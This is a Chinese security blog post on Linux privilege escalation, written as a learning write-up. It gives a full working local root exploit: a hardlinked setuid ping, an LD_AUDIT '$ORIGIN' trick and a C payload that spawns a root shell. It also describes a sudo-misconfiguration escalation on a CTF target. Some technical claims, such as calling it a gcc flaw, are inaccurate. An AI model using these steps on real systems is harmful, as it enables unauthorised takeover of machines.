<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <title>Linux提权（二） | WLSMILE Blog</title>
  <meta name="keywords" content=" 提权 , Linux ">
  <meta name="description" content="Linux提权（二） | WLSMILE Blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="UNION SELECT 联合查询注入SQL server 中的联合查询注入和 MySQL 中的联合查询注入非常相似，但是也有不同的地方。相同点是都必须要有回显位，并且要与列数相同。不同的是MySQL占位符一般用1，2，3，4数字，而 SQL server 中要用到 null 作为占位符。因为如果用数字的话会牵扯到隐式转化的问题而导致无法有正常的回显。 首先利用 order by 语句查询出有几列">
<meta name="keywords" content="注入,sql server">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL SERVER 注入（二）">
<meta property="og:url" content="https://luckdogiii.github.io/2019/10/11/7/index.html">
<meta property="og:site_name" content="WLSMILE Blog">
<meta property="og:description" content="UNION SELECT 联合查询注入SQL server 中的联合查询注入和 MySQL 中的联合查询注入非常相似，但是也有不同的地方。相同点是都必须要有回显位，并且要与列数相同。不同的是MySQL占位符一般用1，2，3，4数字，而 SQL server 中要用到 null 作为占位符。因为如果用数字的话会牵扯到隐式转化的问题而导致无法有正常的回显。 首先利用 order by 语句查询出有几列">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://luckdogiii.github.io/images/0.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/1.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/2.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/3.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/4.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/5.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/6.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/7.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/8.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/9.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/10.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/11.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/12.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/13.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/14.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/15.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/16.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/17.png">
<meta property="og:image" content="https://luckdogiii.github.io/images/18.png">
<meta property="og:updated_time" content="2019-10-11T13:23:55.241Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL SERVER 注入（二）">
<meta name="twitter:description" content="UNION SELECT 联合查询注入SQL server 中的联合查询注入和 MySQL 中的联合查询注入非常相似，但是也有不同的地方。相同点是都必须要有回显位，并且要与列数相同。不同的是MySQL占位符一般用1，2，3，4数字，而 SQL server 中要用到 null 作为占位符。因为如果用数字的话会牵扯到隐式转化的问题而导致无法有正常的回显。 首先利用 order by 语句查询出有几列">
<meta name="twitter:image" content="https://luckdogiii.github.io/images/0.png">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.0.1" rel="stylesheet">

<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1"></script>

<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>



<script src="//cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>

<script src="/js/iconfont.js?v=1.0.1"></script>

</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="false">
  <input class="theme_blog_path" value>
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>WLSMILE</span>
</div>

<div class="icon">
    
        
        <a title="rss" href="/atom.xml" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-rss"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
        <a title="instagram" href="https://www.facebook.com/faker.tops" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-instagram"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
        <a title="jianshu" href="https://www.jianshu.com/u/1f9e409c0809" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-jianshu"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
        <a title="email" href="mailto:1102528985@qq.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=1102528985&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
    
        
        <a title="neteasemusic" href="https://music.163.com/#/user/home?id=88151013" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-neteasemusic"></use>
                </svg>
            
        </a>
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(7)</small></div></li>
    
        
            
            <li><div data-rel="工具">工具<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="其他">其他<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Linux">Linux<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="Web安全">Web安全<small>(2)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a class="about  hasFriend  site_url"  href="/about">关于</a><a style="width: 50%"  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="7">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
            <li><a target="_blank" href="http://zeying.vip/">无忧君</a></li>
            
            <li><a target="_blank" href="http://www.wealeson521.com/wordpress/">wealeson521</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode==13){return false;}">
        <input class="search" type="text" placeholder="Search..." autocomplete="off"id="local-search-input" >
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">sqlmap</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">漏洞复现</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">提权</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">Linux</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">注入</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">sql server</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    
    <nav id="title-list-nav">
        
        <a  class="工具 "
           href="/2019/10/08/1/"
           data-tag="sqlmap"
           data-author="" >
            <span class="post-title" title="SQLMAP使用总结">SQLMAP使用总结</span>
            <span class="post-date" title="2019-10-08 15:13:47">2019/10/08</span>
        </a>
        
        <a  class="其他 "
           href="/2019/10/08/2/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="phpstudy远程代码执行复现">phpstudy远程代码执行复现</span>
            <span class="post-date" title="2019-10-08 20:31:10">2019/10/08</span>
        </a>
        
        <a  class="Linux "
           href="/2019/10/09/4/"
           data-tag="提权,Linux"
           data-author="" >
            <span class="post-title" title="Linux提权（一）">Linux提权（一）</span>
            <span class="post-date" title="2019-10-09 08:31:52">2019/10/09</span>
        </a>
        
        <a  class="其他 "
           href="/2019/09/11/3/"
           data-tag="漏洞复现"
           data-author="" >
            <span class="post-title" title="RDP漏洞CVE-2019-0708复现">RDP漏洞CVE-2019-0708复现</span>
            <span class="post-date" title="2019-09-11 20:13:47">2019/09/11</span>
        </a>
        
        <a  class="Web安全 "
           href="/2019/10/11/6/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（一）">SQL SERVER 注入（一）</span>
            <span class="post-date" title="2019-10-11 10:28:47">2019/10/11</span>
        </a>
        
        <a  class="Web安全 "
           href="/2019/10/11/7/"
           data-tag="注入,sql server"
           data-author="" >
            <span class="post-title" title="SQL SERVER 注入（二）">SQL SERVER 注入（二）</span>
            <span class="post-date" title="2019-10-11 21:09:17">2019/10/11</span>
        </a>
        
        <a  class="Linux "
           href="/2019/10/09/5/"
           data-tag="提权,Linux"
           data-author="" >
            <span class="post-title" title="Linux提权（二）">Linux提权（二）</span>
            <span class="post-date" title="2019-10-09 20:10:07">2019/10/09</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-5" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">Linux提权（二）</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a href="javascript:" data-rel="Linux">Linux</a>
            
        </span>
        
        
        <span class="tag">
            
            <a href="javascript:" class="color3">提权</a>
            
            <a href="javascript:" class="color1">Linux</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2019-10-11 08:12:59'>2019-10-09 20:10</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux提权"><span class="toc-text">Linux提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#低内核版本提权"><span class="toc-text">低内核版本提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sudo配置错误"><span class="toc-text">sudo配置错误</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux提权"></a>Linux提权</h2><p>上一次提权提到了内核漏洞本地提权，SUID提权，但是在面对复杂的服务器环境时需要了解更多的提权方法。上次在ny护网的时候搞到了一台Linux服务器的低权限oracle账号，然后尝试提权成功，所以有了这篇文章。</p>
<h2 id="低内核版本提权"><a href="#低内核版本提权" class="headerlink" title="低内核版本提权"></a>低内核版本提权</h2><p>发行版本是rhel5.5内核版本是比较低的 2.6.18，但是脏牛漏洞是对内核版本大于2.6.22可以利用，所以我们可以利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限。<br><code>tmp目录具有777权限</code></p>
<p>1.进入tmp目录并创建目录exploit</p>
<pre><code>cd /tmp
mkdir exploit
</code></pre><p>2.查看ping命令所具有的权限</p>
<pre><code>ll /bin/ping
</code></pre><p>3.创建target文件硬链接</p>
<pre><code>ln /bin/ping /tmp/exploit/target
</code></pre><p>4.查看target文件权限</p>
<pre><code>ll /tmp/exploit/target
</code></pre><p>5.把target文件加载到内存中</p>
<pre><code>exec 3&lt; /tmp/exploit/target
</code></pre><p>6.查看target在内存的状态</p>
<pre><code>ll /proc/$$/fd/3
</code></pre><p>7.删除target文件</p>
<pre><code>rm -rf /tmp/exploit/
</code></pre><p>8.再次查看target在内存的状态</p>
<pre><code>ll /proc/$$/fd/3
</code></pre><p>9.创建一个c语言代码</p>
<p><code>vim payload.c</code></p>
<pre><code>void __attribute__((constructor)) init()  // 两个下划线
{
     setuid(0);
     system(&quot;/bin/bash&quot;);
}
</code></pre><p>10.利用gcc编译这段代码</p>
<pre><code>gcc -W -fPIC -shared -o /tmp/exploit payload.c
</code></pre><p>11.提升到root权限</p>
<pre><code>LD_AUDIT=&quot;\$ORIGIN&quot; exec /proc/self/fd/3
ERROR: ld.so: object &#39;$ORIGIN&#39; cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
</code></pre><p><img src="/images/5/1.png" alt></p>
<p>等到执行完之后就是root权限了。这是一个老版本的gcc编译器漏洞了，虽然老，但是还是学习一下的好。</p>
<h2 id="sudo配置错误"><a href="#sudo配置错误" class="headerlink" title="sudo配置错误"></a>sudo配置错误</h2><p>这个方法是在freebuf上的一篇文章上看到的，但是实际情况下还没有见到过。</p>
<p>1.查看 <code>/home/</code>目录下是否有<code>.sudo_as_admin_successful</code>文件，如果有的话直接可以输入当前低权限账号的密码直接<code>sudo su</code>切换为root用户。</p>
<hr>
<p>原文链接：<a href="https://www.freebuf.com/vuls/211847.html" target="_blank" rel="noopener">https://www.freebuf.com/vuls/211847.html</a><br>以下是原文的利用过程：</p>
<blockquote>
<p>靶机 JIS-CTF-VulnUpload-CTF01 就是很好的一个案例。首先，利用 web 漏洞拿到低权账号 technawi 的 meterpreter 会话：</p>
</blockquote>
<p><img src="/images/5/2.png" alt></p>
<p>接着，翻找文件找到其密码：</p>
<p><img src="/images/5/3.png" alt></p>
<p>然后，发现 home/ 中存在 .sudo_as_admin_successful 文件：</p>
<p><img src="/images/5/4.png" alt></p>
<p>最后，用 technawi 自己的密码切换为 root 用户：</p>
<p><img src="/images/5/5.png" alt></p>
<p>linux提权的方法有很多而且很复杂，目前先收集起来，待以后再仔细研究</p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 1102528985@qq.com </span>
    </div>
</article>



<div class="article_copyright">
    <p><span class="copy-title">文章标题:</span>Linux提权（二）</p>
    
    <p><span class="copy-title">本文作者:</span><a href="javascript:void(0)" title="WLSMILE">WLSMILE</a></p>
    <p><span class="copy-title">发布时间:</span>2019-10-09, 20:10:07</p>
    <p><span class="copy-title">最后更新:</span>2019-10-11, 08:12:59</p>
    <span class="copy-title">原始链接:</span><a class="post-url" href="/2019/10/09/5/" title="Linux提权（二）">https://luckdogiii.github.io/2019/10/09/5/</a>
    <p>
        <span class="copy-title">版权声明:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
    </p>
</div>





    




    </div>
    <div class="copyright">
        <p class="footer-entry">©2019-2019 WLSMILE</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" href="javascript:void(0)"></a>
    </div>
</div>
<div class="acParent"></div>

</body>
<script src="/js/jquery.pjax.js?v=1.0.1" ></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'default';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#sqlmap','#漏洞复现','#提权','#Linux','#注入','#sql server',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().split('\n').length - 1, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: #fafafa;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 482px;
        }
        .nav.fullscreen {
            margin-left: -482px;
        }
        .nav-left {
            width: 90px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 482px;
            margin-left: -482px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
        .nav .hide-list.fullscreen {
            left: 482px
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>






<!-- 下面代码开启网易音乐插件 -->
<!-- <div style="position:absolute; bottom: 0; right: 0;">
    <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=450 src="//music.163.com/outchain/player?type=0&id=2851060167&auto=1&height=430"></iframe>
</div>
 -->
</html>
